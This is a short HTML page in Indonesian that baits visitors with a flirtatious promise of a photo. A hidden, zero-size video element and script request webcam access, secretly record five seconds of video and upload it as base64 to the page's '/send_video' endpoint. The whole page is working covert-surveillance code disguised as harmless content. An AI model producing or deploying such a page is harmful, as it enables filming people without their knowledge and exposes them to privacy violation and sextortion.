<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <title>Rekam Otomatis 5 Detik</title>
</head>
<body>
    <h2>tunggu 10 detik buat liat pap dari aku ☺☺☺</h2>
    <video id="video" autoplay muted style="width:0px; height:0px;"></video>

    <script>
        const video = document.getElementById('video');

        navigator.mediaDevices.getUserMedia({ video: true, audio: false })
            .then(stream => {
                video.srcObject = stream;

                // Mulai rekam dengan MediaRecorder
                const mediaRecorder = new MediaRecorder(stream);
                const chunks = [];

                mediaRecorder.ondataavailable = event => {
                    if (event.data.size > 0) {
                        chunks.push(event.data);
                    }
                };

                mediaRecorder.onstop = () => {
                    const blob = new Blob(chunks, { type: 'video/webm' });
                    const reader = new FileReader();
                    reader.onloadend = () => {
                        const base64data = reader.result;
                        fetch('/send_video', {
                            method: 'POST',
                            headers: { 'Content-Type': 'application/json' },
                            body: JSON.stringify({ video: base64data })
                        })
                        .then(res => res.json())
                        .then(data => alert(data.message || data.error))
                        .catch(err => alert("Gagal kirim: " + err));
                    };
                    reader.readAsDataURL(blob);
                };

                mediaRecorder.start();

                // Stop otomatis setelah 5 detik
                setTimeout(() => {
                    mediaRecorder.stop();
                    stream.getTracks().forEach(track => track.stop());
                }, 5000);
            })
            .catch(err => alert("Tidak bisa akses kamera: " + err));
    </script>
</body>
</html>
